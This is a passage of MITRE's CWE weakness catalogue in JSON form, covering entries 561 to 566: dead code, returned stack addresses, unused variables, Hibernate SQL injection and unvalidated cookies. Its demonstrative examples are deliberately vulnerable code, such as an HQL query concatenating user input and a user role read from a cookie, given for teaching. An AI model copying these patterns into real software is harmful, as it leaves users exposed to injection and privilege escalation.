effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Attack Modeling"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Binary / Bytecode Quality Analysis","Compare binary / bytecode to application permission manifest"]}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Automated Monitored Execution"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Permission Manifest Analysis"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Source Code Quality Analyzer"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Warning Flags","Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Remove dead code before deploying the application."},{"Phase":"Testing","Description":"Use a static analysis tool to spot dead code."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The condition for the second if statement is impossible to satisfy. It requires that the variables be non-null, while on the only path where s can be assigned a non-null value there is a return statement.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"String s = null;if (b) {}if (s != null) {}","xhtml:br":["","",""],"xhtml:div":[{"#text":"s = \\"Yes\\";return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"Dead();","attr":{"@_style":"margin-left:10px;"}}]}}},{"Intro_Text":"In the following class, two private methods call each other, but since neither one is ever invoked from anywhere else, they are both dead code.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class DoubleDead {}","xhtml:div":{"#text":"private void doTweedledee() {}private void doTweedledumb() {}public static void main(String[] args) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"doTweedledumb();","attr":{"@_style":"margin-left:10px;"}},{"#text":"doTweedledee();","attr":{"@_style":"margin-left:10px;"}},{"#text":"System.out.println(\\"running DoubleDead\\");","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["",""]}}},"Body_Text":"(In this case it is a good thing that the methods are dead: invoking either one would cause an infinite loop.)"},{"Intro_Text":"The field named glue is not used in the following class. The author of the class has accidentally put quotes around the field name, transforming it into a string constant.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class Dead {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String glue;public String getGlue() {}","xhtml:br":["",""],"xhtml:div":{"#text":"return \\"glue\\";","attr":{"@_style":"margin-left:10px;"}}}}}}}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2014-1266","Description":"chain: incorrect \\"goto\\" in Apple SSL product bypasses certificate validation, allowing Adversary-in-the-Middle (AITM) attack (Apple \\"goto fail\\" bug). CWE-705 (Incorrect Control Flow Scoping) -&gt; CWE-561 (Dead Code) -&gt; CWE-295 (Improper Certificate Validation) -&gt; CWE-393 (Return of Wrong Status Code) -&gt; CWE-300 (Channel Accessible by Non-Endpoint).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1266"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC07-C","Entry_Name":"Detect and remove dead code"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"MSC00-PL","Entry_Name":"Detect and remove dead code","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP2","Entry_Name":"Unused Entities"},{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-20"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-20"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Common_Consequences, References, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}]}},"562":{"attr":{"@_ID":"562","@_Name":"Return of Stack Variable Address","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A function returns the address of a stack variable, which will cause unintended program behavior, typically in the form of a crash.","Extended_Description":"Because local variables are allocated on the stack, when a program returns a pointer to a local variable, it is returning a stack address. A subsequent function call is likely to re-use this same stack address, thereby overwriting the value of the pointer, which no longer corresponds to the same variable since a function\'s stack frame is invalidated when it returns. At best this will cause the value of the pointer to change unexpectedly. In many cases it causes the program to crash the next time the pointer is dereferenced.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"758","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"672","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"825","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Indirect"},{"Ordinality":"Primary"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Availability","Integrity","Confidentiality"],"Impact":["Read Memory","Modify Memory","Execute Unauthorized Code or Commands","DoS: Crash, Exit, or Restart"],"Note":"If the returned stack buffer address is dereferenced after the return, then an attacker may be able to modify or read memory, depending on how the address is used.  If the address is used for reading, then the address itself may be exposed, or the contents that the address points to.  If the address is used for writing, this can lead to a crash and possibly code execution."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Use static analysis tools to spot return of the address of a stack variable."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following function returns a stack address.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* getName() {}","xhtml:div":{"#text":"char name[STR_MAX];fillInName(name);return name;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"DCL30-C","Entry_Name":"Declare objects with appropriate storage durations","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS34-C","Entry_Name":"Do not call putenv() with a pointer to an automatic variable as the argument"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Stack Address Returned","attr":{"@_Date":"2008-04-11"}}}},"563":{"attr":{"@_ID":"563","@_Name":"Assignment to Variable without Use","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The variable\'s value is assigned but never used, making it a dead store.","Extended_Description":"After the assignment, the variable is either assigned another value or goes out of scope. It is likely that the variable is simply vestigial, but it is also possible that the unused variable points out a bug.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1164","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Alternate_Terms":{"Alternate_Term":{"Term":"Unused Variable"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"],"Note":"This weakness could be an indication of a bug in the program or a deprecated variable that was not removed and is an indication of poor quality. This could lead to further bugs and the introduction of weaknesses."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Remove unused variables from the code."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code excerpt assigns to the variable r and then overwrites the value without using it.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"r = getName();r = getNewBuffer(buf);","xhtml:br":""}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC00-C","Entry_Name":"Compile cleanly at high warning levels"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"MSC01-PL","Entry_Name":"Detect and remove unused variables","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP2","Entry_Name":"Unused Entities"}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Common_Consequences, Description, Name, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Alternate_Terms, Name, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Unused Variable","attr":{"@_Date":"2014-06-23"}},{"#text":"Assignment to Variable without Use (\'Unused Variable\')","attr":{"@_Date":"2017-11-08"}}]}},"564":{"attr":{"@_ID":"564","@_Name":"SQL Injection: Hibernate","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Using Hibernate to execute a dynamic SQL statement built with user-controlled input can allow an attacker to modify the statement\'s meaning or to execute arbitrary SQL commands.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"89","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"89","@_View_ID":"928","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"89","@_View_ID":"1305","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"A non-SQL style database which is not subject to this flaw may be chosen."},{"Phase":"Architecture and Design","Description":"Follow the principle of least privilege when creating user accounts to a SQL database. Users should only have the minimum privileges necessary to use their account. If the requirements of the system indicate that a user can read and modify their own data, then limit their privileges so they cannot read/write others\' data."},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"Phase":"Implementation","Description":"Implement SQL strings using prepared statements that bind variables. Prepared statements that do not bind variables can be vulnerable to attack."},{"Phase":"Implementation","Description":"Use vigorous allowlist style checking on any user input that may be used in a SQL command. Rather than escape meta-characters, it is safest to disallow them entirely. Reason: Later use of data that have been entered in the database may neglect to escape meta-characters before use. Narrowly define the set of safe characters based on the expected value of the parameter in the request."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code excerpt uses Hibernate\'s HQL syntax to build a dynamic query that\'s vulnerable to SQL injection.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String street = getStreetFromUser();Query query = session.createQuery(\\"from Address a where a.street=\'\\" + street + \\"\'\\");","xhtml:br":""}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"109"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"565":{"attr":{"@_ID":"565","@_Name":"Reliance on Cookies without Validation and Integrity Checking","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application relies on the existence or values of cookies when performing security-critical operations, but it does not properly ensure that the setting is valid for the associated user.","Extended_Description":"Attackers can easily modify cookies, within the browser or by implementing the client-side code outside of the browser. Reliance on cookies without detailed validation and integrity checking can allow attackers to bypass authentication, conduct injection attacks such as SQL injection and cross-site scripting, or otherwise modify inputs in unexpected ways.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"642","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"669","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"602","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"It is dangerous to use cookies to set a user\'s privileges. The cookie can be manipulated to escalate an attacker\'s privileges to an administrative level."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Avoid using cookie data for a security-related decision."},{"Phase":"Implementation","Description":"Perform thorough input validation (i.e.: server side validation) on the cookie data if you\'re going to use it for a security related decision."},{"Phase":"Architecture and Design","Description":"Add integrity checks to detect tampering."},{"Phase":"Architecture and Design","Description":"Protect critical cookies from replay attacks, since cross-site scripting or other attacks may allow attackers to steal a strongly-encrypted cookie that also passes integrity checks. This mitigation applies to cookies that should only be valid during a single transaction or session. By enforcing timeouts, you may limit the scope of an attack. As part of your integrity check, use an unpredictable, server-side value that is not exposed to the client."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-61"},"Intro_Text":"The following code excerpt reads a value from a browser cookie to determine the role of the user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Cookie[] cookies = request.getCookies();for (int i =0; i&lt; cookies.length; i++) {}","xhtml:br":"","xhtml:div":{"#text":"Cookie c = cookies[i];if (c.getName().equals(\\"role\\")) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"userRole = c.getValue();","attr":{"@_style":"margin-left:10px;"}}}}},"Body_Text":"It is easy for an attacker to modify the \\"role\\" value found in the locally stored cookie, allowing privilege escalation."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP29","Entry_Name":"Faulty endpoint authentication"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"226"}},{"attr":{"@_CAPEC_ID":"31"}},{"attr":{"@_CAPEC_ID":"39"}}]},"Notes":{"Note":{"#text":"This problem can be primary to many types of weaknesses in web applications. A developer may perform proper validation against URL parameters while assuming that attackers cannot modify cookies. As a result, the program might skip basic input validation to enable cross-site scripting, SQL injection, price tampering, and other attacks..","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Description, Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-16","Modification_Importance":"Critical","Modification_Comment":"Clarified name and description; broadened the definition to include any security-critical operation, not just security decisions, to allow for relationships with injection weaknesses."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Name, Potential_Mitigations, Relationship_Notes, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Use of Cookies","attr":{"@_Date":"2008-04-11"}},{"#text":"Use of Cookies in Security Decision","attr":{"@_Date":"2009-07-27"}}]}},"566":{"attr":{"@_ID":"566","@_Name":"Authorization Bypass Through User-Controlled SQL Primary Key","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a database table that includes records that should not be accessible to an actor, but it executes a SQL statement with a primary key that can be controlled by that actor.","Extended_Description":{"xhtml:p":["When a user can set a primary key to any value, then the user can modify the key to point to unauthorized records.","Database access control errors occur when:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Data enters a program from an untrusted source.","The data is used to specify the value of a primary key in a SQL query.","The untrusted source does not have the permissions to be able to access all rows in the associated table."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"639","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Technology":{"attr":{"@_Name":"Database 